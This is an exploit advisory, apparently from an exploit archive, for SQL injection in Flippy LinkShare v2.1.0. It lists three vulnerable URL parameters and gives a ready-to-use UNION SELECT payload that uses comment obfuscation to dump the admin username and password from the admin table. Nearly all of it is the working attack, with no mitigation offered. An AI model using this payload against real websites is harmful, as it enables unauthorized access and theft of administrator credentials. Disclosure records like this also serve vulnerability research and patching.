21 lines
No EOL
837 B
Text
21 lines
No EOL
837 B
Text
# # # # #
|
||
# Exploit Title: Flippy LinkShare – Visual Link Sharing Websites Builder Script v2.1.0 - SQL Injection
|
||
# Google Dork: N/A
|
||
# Date: 06.02.2017
|
||
# Vendor Homepage: https://www.flippyscripts.com/
|
||
# Software Buy: https://www.flippyscripts.com/flippy-linkshare-visual-link-sharing-websites-builder/
|
||
# Demo: http://linkshare2.flippydemos.com/
|
||
# Version: 2.1.0
|
||
# Tested on: Win7 x64, Kali Linux x64
|
||
# # # # #
|
||
# Exploit Author: Ihsan Sencan
|
||
# Author Web: http://ihsan.net
|
||
# Author Mail : ihsan[beygir]ihsan[nokta]net
|
||
# # # # #
|
||
# SQL Injection/Exploit :
|
||
# http://localhost/[PATH]/profile.php?id=[SQL]
|
||
# http://localhost/[PATH]/cat.php?cid=[SQL]
|
||
# http://localhost/[PATH]/user_posts.php?id=[SQL]
|
||
# Etc...
|
||
# -9999+/*!50000union*/+select+1,2,3,4,concat_ws(0x3a,adminuser,0x3a,adminpassword),6,7,8,9,10,11,12,13,14,15+from+admin--
|
||
# # # # # |